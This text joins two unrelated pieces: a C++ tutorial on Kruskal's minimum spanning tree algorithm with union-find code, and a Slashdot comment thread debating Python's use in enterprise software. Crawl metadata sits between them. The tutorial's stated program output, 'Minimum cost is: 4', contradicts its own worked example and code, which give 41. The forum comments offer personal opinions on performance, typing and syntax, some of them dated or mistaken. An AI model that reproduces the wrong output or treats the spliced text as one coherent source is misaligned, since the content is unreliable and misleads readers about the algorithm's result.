There are two main ways of implementing Kruskal’s algorithm in C++: disjoint sets or priority queues. Using disjoint sets is slightly better as it helps visualize the change in the groups at any point in time.
The algorithm is as follows:-
- Initialize an array for storing the groups of the vertices.
- Initialize an array for storing the edges of the graph with their weights.
- Initialize the spanning tree as an empty array.
- Put all vertices of the graph into different groups.
- Sort the array of edges in increasing order of weights.
- Continue step 7 till there is no more edge remaining in the sorted array of edges
- If the group of one node of an edge does not match the group of the other node of the edge, add them both to the same group and add the edge to the spanning tree array.
- Iterate through the spanning-tree array and add the weights of the edges.
- The sum of the edges thus obtained is the weight of the minimum spanning tree, while the spanning tree array contains the edges for the same.
Example
Let’s work out an example. Consider the above graph and let’s try to apply Kruskal’s algorithm to it.
Initially, we have to pick the first edge which has the minimum weight. AB is picked here, which weights 10.
Now, we pick the edge with the second minimum weight. CD is picked here since it weighs 13.
Proceeding further, we find that the edge with minimum weight is BC. The weight of this edge is 18.
Since a complete tree is obtained, we stop the algorithm here. The minimum weight for the tree thus obtained is 10+18+13=41.
C++ Program for Kruskal's Algorithm
The C++ implementation of Kruskal’s algorithm with the help of the union-find algorithm is given below. This is the source code of the C++ Krushkal Algorithm:-
#include <iostream> #include <vector> #include <algorithm> using namespace std; const int MAX = 1e6-1; int root[MAX]; const int nodes = 4, edges = 5; pair <long long, pair<int, int> > p[MAX]; int parent(int a) //find the parent of the given node { while(root[a] != a) { root[a] = root[root[a]]; a = root[a]; } return a; } void union_find(int a, int b) //check if the given two vertices are in the same “union” or not { int d = parent(a); int e = parent(b); root[d] = root[e]; } long long kruskal() { int a, b; long long cost, minCost = 0; for(int i = 0 ; i < edges ; ++i) { a = p[i].second.first; b = p[i].second.second; cost = p[i].first; if(parent(a) != parent(b)) //only select edge if it does not create a cycle (ie the two nodes forming it have different root nodes) { minCost += cost; union_find(a, b); } } return minCost; } int main() { int x, y; long long weight, cost, minCost; for(int i = 0;i < MAX;++i) //initialize the array groups { root[i] = i; } p[0] = make_pair(10, make_pair(0, 1)); p[1] = make_pair(18, make_pair(1, 2)); p[2] = make_pair(13, make_pair(2, 3)); p[3] = make_pair(21, make_pair(0, 2)); p[4] = make_pair(22, make_pair(1, 3)); sort(p, p + edges); //sort the array of edges minCost = kruskal(); cout << "Minimum cost is: "<< minCost << endl; return 0; }
Output
The output for the given code segment is:
Minimum cost is: 4
Conclusion
Our explanation of Kruskal’s algorithm and how it can be used to find a minimum spanning tree for a graph should prove to a useful tool in your preparation. The attached code also shows an implementation of Kruskal’s algorithm in C++. | https://favtutor.com/blogs/kruskal-algorithm-cpp | CC-MAIN-2022-05 | refinedweb | 1,265 | 68.1 |
Python Moving into the Enterprise 818!"
Which Enterpise (Score:4, Funny)
Python on the NX-01 (Score:3, Funny)
Jython? (Score:4, Interesting)
Re:Jython? (Score:5, Insightful)
Re:Jython? (Score:5, Informative)
It's the output of Java programmers that turns my stomach.
Re:Jython? (Score:5, Insightful)
I think the level of knowledge among Java programmers is impressive, but by in large I've found they aren't necessarily better programmers because of it. I've learned this the hard way, by hiring people with incredibly impressive knowledge of Java APIs, and then watching them struggle with overengineered designs that attempt to drag as much of that knowledge in as they can manage. I'm not going to make sweeping generalizations here, only to state that I've had bad experiences Java guys who prefer to wander lost in the wonderfully rich world of Java APIs and frameworks than focusing on a customer's problem.
Re:Too bad... (Score:5, Insightful)
I'm sorry, but the "but it's slow" argument does not hold for most software designed today. Let's please get over it.
Re:Too bad... (Score:3, Informative)
What planet are you from? I do a lot of work at oil companies and utilities, and they have tons of slow software that causes them to hemorrhage man-hours at an insane rate. I'm talking about the big name companies spending tens of millions of dollars per year on bloated applications that take 30-60 seconds just to start up and take just as long to perform many of their routine functions. People often use these vario
Re:Too bad... (Score:3, Insightful)
When I code for fun I seldom do that in C/C++ anymore. At least not I know that the application won't need "that extra juice". What's the point in spending several times the develeopment effort on making it work properly instead of
Re:Too bad... (Score:5, Insightful)
What's the point of making it work properly?!?!? Surely you have mis-spoken here.
Let's play a game. Let's suppose a bunch of little apps for which speed is not a critical factor for any one of them. As a forinstance, look at all those apps presently running in the system tray. Let's suppose that those apps are written badly or are written in inefficient languages. That shouldn't be too much of a stretch.
Now, let's try to do something. Whether you are trying to run a realtime application like desktop video conferencing or create a document in a word processor, it doesn't really matter. What ever it is that you try will be a struggle because the system's resources (CPU cycles, memory, swap space) are consumed by all those "noncritical" apps and their inefficiencies. A 1Ghz processor with 1 gig of RAM is no longer adequate? That's ridiculous! And yet, that is where we are at today.
Everyone seems to feel that their "Ultimate MP3 player" is the only app in the world or at least the only one that will ever be run on a machine. They don't think that speed and size are important. After all, they have a very powerful machine at their disposal with oodles of available resources, right?. They fail to realize that their program, no matter how wonderful, is only one of countless others that are all running at the same time and are required to share the resources. They fail to realize that their app may not be too slow when run by itself but, it becomes too slow when run with everything else.
Today, the preferred system is 3Ghz, 64bit, with at least 2 gigs of RAM. Why? What's the point of such a powerful system? Speed! That's the point. Speed is important. Code efficiency is important. But, as programmers continue to deny this and produce poorly written and bloated/slow apps or use inefficient languages, the time will come when a 6Ghz processor is not enough. Doesn't that sound stupid?
Re:Too bad... (Score:4, Insightful)
If there was money to be made by making that WeatherThing or UltimateMP3 player fast and efficient - companies would do that. There's plenty of programmers out there capable of writing in or learning more low level languages - of optimizing each loop or branch. The problem is that people are not willing to pay all of the extra associated with the development and testing of software written with risky optimizations (optimizations tend to complicate and obfuscate code, reduce abstraction, etc) in unsafe languages.
The truth is the consumer would rather spend an extra $100 to get enough RAM then spend $10 per program on their PC (that adds up faster) for the programmers to program it "correctly." It's not economically efficient, at least not in the eyes of the consumers.
Why do you think so many kitchen appliances last only a year or two nowaways? Or current VCRs which almost qualify as "disposable." People are rarely willing to pay extra when they think the low cost option is "good enough." In some ways this is what killed the Mac - it was better according to many metrics, but PCs were "good enough" for the average consumer, and the price difference wasn't justifyable.
A computer is a tool to get work done, nothing more. If people valued security, reliability, and efficiency enough, most software would be secure, reliable and efficeint. But people value features and low price, so that's what the market gives them.
Look on the bright side - at least compilers are getting better.
Re:Too bad... (Score:3, Insightful)
The logical extreme of the "all apps must be as fast as possible" argument is to code in ASM. I suggest that anybody who pushes this argument write every app in ASM. See how long it takes before this person gets fired for inefficiency...
Why are some coders hesitant to "use the right tool for the job"? ASM might be necessary if you're optimizing a crypto or compression loop, while C or C++ might be more appropriate for the
Re:Too bad... (Score:5, Insightful)
Another poster already made a clarification on this. I didn't "mis-speak" I was just a bit obscure with my meaning. Point being, if you code in C/C++ you'll spend a lot of time making the program work correctly. If you write in eg Java or Python you can get the program working correctly in a fraction of the time. This means you can add polish or move on to new stuff.
Point being, you are more productive in other languages as you don't have to mess with the details so much.
First off, I'm willing to bet that virtually none of the little apps you currently have running are written in Java/Python whatnot. A sloppy coder can leak memeory in any language. (In fact I'd say it's a lot easier to leak memory in a language without a GC.) So moving to C/C++ doesn't really fix the memory issue.
That they consume enourmous amounts of CPU is also not really true. Those processes I have running on my machine all go in at 0% CPU time. If you add them together they might reach a few percent. Not really something which will stop you from typing in Word.
The fix for this "problem" is to get an OS with a descent scheduler so you can prioritise processes properly. That way your real-time applications won't suffer because your little application wants to check for new mail.
No, bragging to your friends that you can get 180 FPS in Doom3 is important. Very few people actually need a 3GHz 64-bit CPU with 2GB memory, I have one and I sure as hell don't need it.
And while code has become more bloated and unoptimised by the years a lot of that is because today a computer can do quite a hell of a lot more than say 10 years ago. Is all of that necessary stuff? Hell no! Is it more fun? Hell yes!
Finally there is one specific area of consumer software that actually demands better computers. That is games. Interestingly enough that area also have many of the best coders.
Re:Too bad... (Score:3, Interesting)
One of the very important featur
Re:Too bad... (Score:3, Insightful)
You are right though that a mix of high level and low level languages tends to give the best result in the lowest amount of time. What has shocked me is that from
Re:Too bad... (Score:3, Insightful)
You meet the demands of the project/customer. I'm not really arguing with you, but this is sort of the point of a thread about Python. It's a tool that helps balance this process for the developer - this in turn should result in benefits to the enduser.
It is nice to have a perfect balance, but efficiency is relative and (developer) resources are finite. Always.
Re:Too bad... (Score:3, Informative)
Apologies in advance if I have misunderstood you, but
...
I think you may be missing an important point here. In older languages, you'll find that the bulk of the work was often thrust on the programmer because the programmer was far cheaper than the computer. One need look no further than the horror of JCL and COBOL to see a high level language that still required inordinate amounts of fiddling by the programmer to get it to play nicely with the computer.
Today, we find that the programmer is far more
Re:Too bad... (Score:3, Insightful)
I program in C every day and I haven't coded an error of the type you describe in over a year. I would know if I had -- our C memory manager catches all manner of pointer problems, accounts for all memory allocation and freeing, memory over- and under-runs, gives us stats on mem
Finding a good general purpose language is hard! (Score:3, Interesting)
The problem is that actually, it hasn't, although it surely should have been a long, long time ago. Alas, the bulk of the software development industry is so driven by marketing hype and buzzwords that it has collectively failed to develop a new language that is a serious choice as a general purpose programming language spann
Re:Finding a good general purpose language is hard (Score:3, Insightful)
I'm also extremely unconvinced that any of the languages you mention have less "reasoned design decisions" than C++. The advant
Re:Finding a good general purpose language is hard (Score:3, Insightful)
It all depends on your application domain. For applications that are predominantly UI/database driven, as obviously many are, C++ has few advantages over something like Java. However, in anything scientific (where performance is often paramount) or in huge markets like embedded or instrument-control applications (where tight code and/or low-level contr
Re:Too bad... (Score:4, Insightful)
Okay, I'm going to refute this is two stages because you're wrong in two ways.
First, it's not a matter of "processors are cheap". It's "processors are cheap compared to programmers, sometimes". If they're paying for months of your time, most of the time it's way cheaper for them to get a faster computer than have you write the thing in a language that will take longer. That is of course dependant on the number of computers it will run on and the performance requirements of the project.
Second, Java and Python are not necessarily slow. In the case of Java, it's usually a matter of keeping heap allocations to a minimum. In the case of Python, it's usually a matter of spending as much time as possible in a C library (even if that means you have to write the C library).
Doing that will usually get you within a factor of two of the performance of C.
Advantages? (Score:4, Interesting)
Besides... wasn't Star Trek cancelled?
Re:Advantages? (Score:2, Interesting)
Re:Advantages? (Score:3, Insightful)
The problem arises in Python's web programming support. The documentation is pretty much non-existent and you can soon get module-overload when you are importing more and more modules to do fairly simple stuff in web apps.
Sometimes I just think while Python is most certainly a far better designed language, PHP/ASP.NET (C#) seems much more 'pratical', and it's definitely much easier to quickly build web apps in.
Is the
Re:Advantages? (Score:4, Informative)
Foundations of Python Network Programming [amazon.com].
My only experience of web progamming in Python is the client end, for web-scraping scripts, and its great for that. The one problem I have is that once in every few hours urllib2 locks up whilst trying to get a page from a particular site.
Re:Advantages? (Score:3, Interesting)
Yes, it's a little bit of a learning courve, but (and I did all of them for a living) it be beats Java/Tomcat/Struts and PHP hands down in productivity/maintainability once you get a grip on it.
Re:Advantages? (Score:5, Informative)
It's like: why build your own search engine, security engine, your own membership system, html form engine, templating system, cache engine, skin system, content types & custom types, etc, when you can just use zope & plone and get a complete framework with open source products and addons on which thousands already develop at the highest profesional level?
I admit that Plone and zope suffer from some documentation problem, but it's possible to overcome that. There are free books, available online (Zope book and The Definitive Guide to Plone) that can get you through. The documentation on Plone.org is getting very good. There are several code repositories (collective is one of them and some on zope.org) that have example products. Also, read the sources, they're not that hard to understand.
And before any of you jump and shout Booo!! ZODB, let me remind you that you can use just as well a reqular sql server to store your content information.
Re:Advantages? (Score:2, Insightful)
If you take out comments, which one is more easier to read?
I have nothing personal against Python, actually I can say that I am a fan of python, but let's use a right tool for a right job.
Re:Advantages? (Score:5, Insightful)
The one thing that Java has going for it are "standard" APIs you can bank on. Is there a standard set of enterprise APIs for Python akin to J2EE?
And all of this isn't to say that one can't leverage both technologies [bea.com] where appropriate, even in commercial products...
How not to win the corporate mind. (Score:4, Insightful)
For good measure, let's look at the documentation from a J2EE vendor here [bea.com].
While PEAK sounds intriguing, I'm not sure that major projects started by Fortune 100 globals will leverage a technology that lacks the level of documentation quality you can find in other products in that space.
I bring this up because documentation is often an indicator of the level of quality you can expect in terms of support. This is not to say PEAK is bad or poorly written, just that the supporting documentation and resources don't match those available for J2EE implementations.
Remember -- it isn't the best technology that wins, but the technology that is most accessible. In the case of enterprise APIs, even though PEAK may be easier and more scalable (and this is an excerpt from their page): But PEAK is different from J2EE: it's a single, free implementation of simpler API's based on an easier-to-use language that can nonetheless scale with better performance than J2EE.
...it will need some time and some nurturing in order to compete for mindshare with developers and non-technical decision makers.
Re:Advantages? (Score:5, Insightful)
That said, the grandparent poster was a bit disingenous. The File class is roughly equivalent to the stat function/structure in C. You can't read the file without creating an inputstream/reader.
So yes. You are correct. It is more verbose when doing simple operations. But I like to think that more complex operations fall together more easily.
Many programmers like to whip something out now. A quick "one off". Instead, often, with a little more time and more ground work, they can make something that is reusable.
In terms of the IO being verbose. Well its pretty flexible. 2 Interfaces (InputStream/OutputStream) are used for many different opertations. Read/write a file. Read/write to/from a socket. Read/write from a string or byte array. Read/write serialized object s to/from a file/socket/etc.... Its not just File IO. Its ALL IO. Long story short, that is why.
Re:Advantages? (Score:3, Insightful)
What a silly picture.
Re:Advantages? (Score:5, Informative)
Re:Advantages? (Score:4, Insightful)
I do suppose if your definition of a good enterprise language is one with all such libraries included, then Python isn't a very good enterprise language. Of course, one could argue that the benefits of Python outweigh the disadvantages at having to download extra packages to handle SOAP, ORB etc.
The difference between Java and Python is similar to the difference between C# and Visual Basic.
I'm a little confused. Are you saying that Python is inferior to Java because Java comes with library X included, whilst with Python library X has to be downloaded separately?
Python is slower than Java and higher level than Java, but beyond that I can't say that there's too much separating Java and Python as languages. Personally, I find programming in Python more efficient, despite having more years experience with Java, but that may be just me.
Re:Advantages? (Score:4, Interesting)
I program a lot. In the course of my job, I have to review a lot of other people's code. I have a particular bracing style I use; and sure enough, I've not only become accustomed to it but also "tuned" to it to the point where it becomes difficult to read someone else's code if (for instance) they use the "K&R" style:
Because at my company, code looks like this:
Those two styles lead to a considerable difference in code density, and so affect readability and my "tuned" response to what I see. And there are so many other C/Java coding styles re bracing and indentation, or lack thereof.
In Python, there is one indentation style. Just one. Not bunches of them. So I get used to the way Python looks, the "tuning" goes into my backbrain or wherever the heck that stuff lives, and I can read anyone's code. This is a distinct benefit for me, and I suspect for others as well.
I would have loved a C compiler that didn't use braces, but used indentation instead. Man, that would have been glorious. Sigh.
Re:Advantages? (Score:5, Informative)
Probably the biggest difference is that there are no checked exceptions in Python. Java has both checked exception and non-checked ("runtime") exceptions, but the normal type of exception used in practice is checked. A checked exception is compulsory for the caller to handle or to pass up.
In theory, a programmer using an API with checked exceptions has to consider all the things that could possibly go wrong. In reality, the idea you can catch every error before you get to testing is a pipe dream. You often don't know what you want to do with it until you have some empirical experience with your basic design. So you do one of two things -- either handle the exception in a half-assed but temporary manner (hoping you'll remember to come back and fix it later), or you pass the buck.
Since the best of these two alternative practices (passing the buck upward) is the better, that means that it is a lot of work to get traction -- you can create a facade layer to orchestrate all kinds of low level stuff, but there is a tendency for that low level stuff to bleed through your facade. Modern Java practice (within the last couple of years) has rediscoverd the runtime exception -- which works exactly like the Python exception. Hibernate 3, for example, uses runtime exceptions. Personally, I'll rip bleeding strips off flesh of one of my guys who does something stupid with an exception -- because it's so easy to just wrap it in a runtime exception (we have a wrapper class for this) and rethrow it. Throwing an exception in a tester's face leads to quicker fault discovery than papering it over.
I think the remaining difference between Python is that it's concept of collections are built-in, whereas the Java language only has generic objects and containers are built using this low level stuff. The resutl is that Python gets a big win when it comes to providing terse, convenient and easy to read syntax for processing all the elements in a collection. In programming terms, this task is about as common as dirt on a farm, and is a major win for Python.
I think Groovy may be more the way to go for Java shops looking for a productivity boost. Python has its own set of gotchas. Which is not to say it isn't quite good, but I'm not a big fan of the idea of combining Java and Python.
Good: (Score:5, Funny)
No such thing (Score:5, Funny)
Dude, programming for the enterprise without the pain is like the Passion of the Christ without the crucifiction... It's Impossible.
In that case, Perl should fit perfectly.
Re:No such thing (Score:3, Funny)
- The Dread Programmer Roberts.
python performance (Score:4, Interesting)
Re:python performance (Score:5, Insightful)
Also you can make the shootout say almost anything, for example if you also calculate the code lines in and weight pidigits with a 4 multiplier, Python comes up as the best of the "serverside languages" (Perl, Python, Java, PHP
Re:python performance (Score:5, Interesting)
Actually I tweaked around with the code - but the rule of the game are just wrong. Just look at the fibonacci test. It requires you to do the stuff completely recursively - thats one of the rules. So you not only generate a huge return stack, you also calculate all the fibonacci numbers far too often. This is just braindead. A good requirement would say: "Calculate the nth fibonacci number". A simple solution would be to start from the beginning and not recursively calulate every fibonacci number bazillion times.
Ok, the test description says that its task is to show the performance of recursion. But then they have to find a task where recursion is an merit - not a flaw. Otherwise you could claim your language is best because it has the best performing idle loops [slashdot.org]
Re:python performance (Score:3, Informative)
But I do understand your point. Different languages have different ways of doing things. The most efficient algorith in C, for instance, may not directly translate to the most efficient algorithm in Python.
Re:python performance (Score:5, Insightful)
Can you establish that more fully? How is testing say, a recursive-descent parser, going to be a more valid test of recursion than a recursive solution for fibonacci numbers?
Fibonacci is convenient because you get lots of recursive calls while only hitting the stack, and no integer overflow. If you were to use a recursive parser and python ended up slower than the others, you could easily blame it on the non-recursive work you were doing. The fibonacci example allows you to accurately describe the recursive performance without all that other stuff getting in the way.
Re:python performance (Score:5, Insightful)
Re:python performance (Score:4, Insightful)
If you come across a situation where Python is too slow for what you want to do, then Python can work happily enough with libraries programmed in C. If that's still not fast enough, then use a different language. But I suspect that for 95% of all programming tasks, Python is fast enough.
Re:python performance (Score:3, Insightful)
People are expensive.
Writing in powerful languages like Python makes your people more effective. And most enterprise apps are not CPU limited anyway.
Re:python performance (Score:3, Interesting)
Say what? You must be living in a very different world than I. If it's an enterprise app, then it has a few thousand internal users. Multiply a few seconds by a few thousand people by a few times an hour by a few dollars per hour. Performance matters. Middle of last year my company pulled two people off their primary project to add a feature that saved our primary users two mouse clicks. Those 4,000 users now save 3 seconds, 10 times an hour, 8 hours a d
Re:python performance (Score:3, Funny)
Did a consultant compute that number? [tripod.com]
Re:python performance (Score:5, Insightful)
I was using an example from the real world to point out why 3 seconds matters. In any significant application there will be some processes that are sufficiently complicated that the choice of algorithm or choice of language will lead to a 3 second delta one way or another. There will also be places where adding a UI shortcut will save 3 seconds.
The real world example talks about UI shortcuts that can save those 3 seconds, and Python makes it easier (according to the common wisdom) to add features. Other languages are more performance centric, and make it easy to save those 3 seconds in operation intensive sections of the code.
I wasn't arguing that Python is bad because it's not as performant. I was saying that both CPU performance and UI friendliness are important, so choosing between Python, Ruby, C#, Java, C++, C or any other language on the spectrum is a question of weighing values.
Ferfucksake people, stop trying to be argumentative and start trying to understand what people are saying. We all claim to be so smart, is our only ability with our intelligence to pick nits? Or can we use our intelligence to seek mutual understanding?
I mean, I can see why the media is turning into a bunch of ranting extremists - they're just a mirror reflecting our own horrible image.
Feh.
Re:python performance (Score:5, Informative)
That being said I am enjoying it. I recently found I was writing a perl program that became unweidly in its comlpexity and impossible to maintain. So I converted to python. My reason for doing so was the existience of a nice matlab packages that allowed me the ability to recycle matlab code and make nice graphs. The syntax in python is cleaner with lets me do more complex array manipulations in the scientific envirnoment.
On the other hand I note that this syntactic sugar is simply a coating. FOr example, python implementes obects via an underlying hash just the same way perl does. But it hides it from view. Thus you get less flexibility in objects than perl and no real ability to optimize their speed since the access method is frozen in the syntax.
other things that trouble me are its seeming incompleteness of many of its metafors. For example, variables do spring into existence upon assignment but they dont auto initialize. Thus simmple things like counting the occurence frequency words in a file becomes a hassle since you have to either explicitly initialize every hashkey value to zero, or use one of the slow accessor methods (like
.get()) that introduce huge perofrmance penalties. And the method of doing this is different for arrays, hashes, and scalars. auto-instantiation is somewhat dangerous too since a typo can now become an error without some means of declaring a variable name was meant to exist (e.g. the perl "my" statement).
Related to the lack of auto-initialization is the tendency to rely on the crutch of throwing exception rather than returning default values or signals that allow the progammer to decide if it's worth throwing an exception. I find I end up wrapping too many inner loop clauses in "try" statements. If operations that failed simply returned "None" or zero as appros many things could be simplified without any loss of ability to use exceptions properly.
other incomplete features are a lack of consistency on when an intrinsic operation is done in-place or returns the result. for example
.sort() is done in place while .ltrim() is not. While one might wish to argue that space issues can require in-place operations, it woul dbe better to detect when an operation can be done in place from the syntax: a = a.sort() should be done inplace. b = a.sort() should not modify "a".
typcasting also seems to be incomplete as well. Take for example the casting of strings to integers. try this: i= int(45.3); i = int('45') ; i = int('45.3'). The first two casts work. the last one is an error. Why? I note
.atoi() also fails in the same way.
My final lament about unfinshed python is the screaming lack of a decent syntax chekcer. Too many of its errors occur at runtime. It's weird that its the low level syntax of python that seems so unbaked. The high level imports are luxurious indeed and are a major attraction of the language. Having a conveinent operation like "shelve" for persistence takes enormous pain out of coding (now if 'shelve' could just use objects rather than olny strings for keys it would be complete).
My hope is that someday python will take advantage of the syntactic sugar to imlpement objects in a faster way under the hood.
all in all I do like python because it's a lot simpler to get the job done than Java or C++. If you know perl then python is useless as a scrpting language (sadly pathetic really) but if you dont know perl then python must seem like a fantastic scripting language if you are coming from C++.
Re:python performance (Score:5, Interesting)
If you want a language that's consistently unsurprising and surprisingly efficient, then try ruby. Performance is not a dream, but that's what compiled languages are for. It lacks most of python's inconsistencies and is really quite pleasant to work with. in ruby there are two sort methods, sort and sort!. One does it in place and one returns a new list. (the ! suffix for mutation and ? suffix for predicates is a gem. I'm pretty sure it was stolen from scheme. It really, really helps make your code clearer)
I still find python more practical for large projects, though, because of the large library and potential for rapid development. I generally use python (possibly with C underpinnings) for larger apps and ruby (with its perl heritage) for scripting. Blocks are the greates when you're dealing with ssh sessions, opening and closing files/database connections, etc. As for per,l I've generally avoided after a few bad experiences trying to decipher six month old code. I really don't think it has a place when ruby has most of its features and enough of it's syntax along with the slickest object system around short of smalltalk.
seriously mistaken information. try is 24x slower (Score:3, Interesting)
I benched the two pieces of code: (note the slashdot ecode tag removes the proper indentation, but this should be obvious in context)
and then using your suggestion:
timing these shows the try
Microsoft's involved? (Score:3, Insightful)
Re:Microsoft's involved? (Score:3, Interesting)
Did anyone else think... (Score:4, Funny)
Re:Did anyone else think... (Score:3, Funny)
Re:Did anyone else think... (Score:3, Funny)
"I wish to complain about this tribble what I purchased not half an hour ago from this very boutique."
...
Toolsets (Score:5, Informative)
I have 6 years of Perl development plus another 8 in C. So, a newcomer to Python (about 2 months now), I have several reactions shaded by that experience:
* Nice syntax: Not perfect, but very passable overall.
* Love the no-brackets: Indentation as a means of delineating code blocks is great; there's no debate over where to put squiggly braces (the 'if test { statement; } stuff;
* Immature toolsets: there are very few mature toolsets yet. We're using SQLObject, which is in version 0.6, as an object-relational-mapper. It's got some limitations and is admittedly not 'enterprise ready'. it's hard to compare to the Perl DBI because the dbi just is an interface and doesn't do mapping.
* Lack of CPAN: the single most fantastic "tool" I've found in my programming career (15 years) has been CPAN. Got a problem? Someone has probably already seen it and started a solution. I know this is in the works for Python but the tools are not all there yet.
* Syntax (bad): Lack of a requirement to declare vars before use. I really would like the ability to require that all vars are explicitly declared before being assigned to. it would help coding reliability.
Just my 5 cents.
-- Kevin
Re:Toolsets (Score:3, Insightful)
Re:Toolsets (Score:5, Informative)
Syntax (bad): Lack of a requirement to declare vars before use. I really would like the ability to require that all vars are explicitly declared before being assigned to. it would help coding reliability.
Actually, Guido von Rossum (the Creator of Python) is working on optional declaration of variables for a future version of Python. Although some Pythonistas are annoyed, it may give folks like you, Kevin, the best of both worlds. There is discussion on comp.lang.python about this from time to time, but it certainly appears as though Guido may take action soon;-))).
Ron Stephens
Python Learning Foundation [awaretek.com]
Re:Purpose of dynamic types? (Score:5, Informative)
So you work with objects by interface rather then by type. The interface also does not have to be a complete interface. You can implement as much of the interface as you need for something. I have some objects that are not lists and can not be used as lists however I have implemented some methods that make it so you can iterate over them like lists and slice them like lists.
This makes many tasks far simpler and encourages more regularity in usage.
How do you check if a substring is in a string, an item in a sequence, a key in dictionary etc? How do you iterate over them? In python it is all the same. if substing in string, if item in seq, if key in dict and the for character in string, for item in seq, for key in dict, for line in file, etc etc etc.
Types are nice but the types the static compilers have are not the types my apps use. The static type systems just end up costing me more time to develop working apps with then the dynamic typing systems and you have to test the product anyways.
sigh... how about a real opinion? (Score:5, Insightful)
I've been using python for pretty much anything in my company that isn't web based, and things couldn't be better. There's talk about python being slower, which it is, but most libraries that do important things are just C wrappers anyway, so the speed decrease is negligible as python is just holding the logic. Tk is nice enough, I guess, but I tend to use wxPython. Either way, it gives you cross platform GUIs, which is always a nice thing. Using pyexe allows you to even 'compile' scripts into exe files with win32 machines.
To be absolutely honest though, I can't think of an easier language to learn (I even teach >40 yo women now and then!) or a quicker language to code in. Once you're accustomed to it, the code just flows out, and I've seldom been disappointed by the results. The formatting requirement helps to ensure that your code isn't a disgusting mess that no one can figure out, YMMV.
A quick check on Dice.com (Score:3, Interesting)
Re:A quick check on Dice.com (Score:5, Insightful)
Re:A quick check on Dice.com (Score:3, Interesting)
You can repeat the same ol' tired mantra, over and over, it doesn't make it true.
And I'll even make the logical case showing how it is a *
Re:A quick check on Dice.com (Score:3, Interesting)
if you had checked for python jobs just 2 years ago i would be amazed if you could find any
(mono is not an option right now).
Python is able to run on all of these syst
Yes, but what about the GUI - speed no problem (Score:5, Insightful)
Re:Yes, but what about the GUI - speed no problem (Score:5, Insightful)
But overall, I completely agree: the std python distro needs to standardize on wx, get rid of Tk and at least incorporate the win32all distribution in the win32 version (it just too nice to leave out).
My biggest peeve as a long-time pythonista (the newsbot in my sig is 25k+ LOC of pure Python) is the standard library: I can live w/o a CPAN-like repository (although that would rock), but for a language that used to boast that it comes "with batteries included" the std lib has gone downhill in the last few versions: too many overlapping or competing modules (why, why do we need httplib, httplib2 and urllib?? or getopt and optparse? and what are the differences between them?) and not enough attention into polishing the library into the fantastic toolkit that was around the 1.5 or early 2.1 series.
Someone, probably the BDFL, needs to stand up and take obsolete modules *out* of the standard library, so that the better ones can be improved even more, instead of having various tweaks and improvements going into overlapping modules. That's the point of having a *standard* library after all...
I'd rather have a good std lib than function decorators and other exotic language constructs...
agreed--cleanup needed (Score:4, Insightful)
The sys/os split, logical as it may seem to the experienced Python programmer, also confuses Python newbies, as does the fact that string needs to be imported and that re is yet another separate module.
I think Python would do well with a major library cleanup, removing rarely used and duplicated functionality, and improving the quality of the library code that is there.
Furthermore, I think it would help for common string, I/O, OS, and regular expression functionality to be importable either via a single import statement (without name conflicts), or to be simply present in the default namespace.
Re:Yes, but what about the GUI - speed no problem (Score:3, Insightful)
Three barriers to enterprise Python (Score:5, Insightful)
Many programmers, including top ones like Eric Raymond [linuxjournal.com], are so put off by Python's use of whitespace as a block delimiter that they swear never to touch the language. In my case, this lasted for two years. You need to spend twenty minutes learning the language, after which the whitespace stops being a problem and starts looking like one of the many great ideas in the language. The challenge is getting people past their initial disgust enough to try it.
2) Misperceptions about typing was to "get" objects for those of us who were around 15 years ago- it's a basic change in how you think. You'll know when you're there, because you'll see in a flash that Java's static type declarations are not only redundant and painful, but they are also in themselves a key source of brittleness in large programs over time.
3) The youngsters' problem
This is probably the biggest barrier: university CS departments have become nothing but Java training courses. In trying to better prepare grads for actual careers, they have added a lot of basic business teaching, which is good. But they no longer bother to give students a real understanding of actual computer science, sticking instead to a cookbook approach using Java. So young people arrive in enterprise IT shops knowing nothing but Java and thinking they know everything, so they are not open to anything requiring a different intellectual approach.
Re:Three barriers to enterprise Python (Score:3, Insightful)
Re:Three barriers to enterprise Python (Score:3, Informative)
You appear to be confusing static vs dynamic type checking with strong vs weak type checking.
Static type checking occurs at compile time, whether or not the language is strongly or weakly typed. Dynamic type checking occurs at run time, regardless of whether or not the language is strongly or weakly typed.
Disagreement still exists about w
Re:Received wisdom (Score:3, Informative)
Re:Whoa, this is all crazyness. (Score:3, Insightful)
Though the error may be clear and obvious, knowing it the first time the code runs can be too late. I've wrote code that can only run a few weeks every year (no
Re:Whoa, this is all crazyness. (Score:3, Insightful)
You'll be able to write the code in Python, and the tests, in less time than most statically typed languages. Many would argue that you can write code and tests in any language faster than writing WORKING code without tests... but that starts down a different avenue of discussion.
We will start to see alot more of it.. (Score:5, Insightful)
It is a great language we use it for everything, web services, linux / win integration, nt services, automation etc.
Only a few tweaks needed (Score:3, Interesting)
Then the newer pythons allow you to import from a zip. That needs polish, there should be a standard way to package a whole app in a zip (just to make it harder to screw up the file distribution. Having a single unit that contains all the needed code is a huge positive; it's just that much harder to screw stuff up.
Then there are people working on compiler speed, really it isn't as bad as you might think from some of the benchmarks. It can use some improvment though and people are working on it.
Why is whitespace significance a good thing? (Score:5, Insightful)
Well, with any other language, if I get a piece of unfamiliar code and have problems reading it due to weird indentation, I just run it through Emacs' indent-region. Can anyone explain to me why this is not just as viable as mandating the indentation policy by embedding it in the language's syntax?
Re:Why is whitespace significance a good thing? (Score:3, Insightful)
As opposed to:
The question is not so much why one should have a language with whitespace significance, but why one should not. Since the vast majority of well-written programs use whitespacing in this manner already, it makes some sense to do away with braces and semi-colons when they're not really needed.
Re:Why is whitespace significance a good thing? (Score:5, Informative)
Whitespace (or more specifically, indentation) significance forces you to make the visual structure of your code match its semantic structure.
Re:Why is whitespace significance a good thing? (Score:3, Insightful)
Java / Python / Ruby (Score:5, Funny)
:-)
(found many places online...)
The trouble with parrots (Score:3, Funny)
Dr. McCoy - - Captain, I wish to register a complaint... Hello? Miss?
Capt. Kirk - - What do you mean, miss?
Dr. McCoy - - Sorry Captain, I have a cold. I wish to make a complaint.
Capt. Kirk - - Not now Bones, we're closing for launch.
Dr. McCoy - - Never mind that, I wish to make a complaint about this tribble that I purchased not half an hour ago from this very bridge.
Capt. Kirk - - Oh yes, the Bajoran Blue. What's wrong with it?
Dr. McCoy - - I'll tell you what's wrong with it. It's dead, Jim, that's what wrong with it.
Python still has severe limits (Score:3, Interesting)
I'm a big fan of Python. I used it almost exclusively before taking my current job. But let's be honest, Python and Java just aren't intended for the same type of applications.
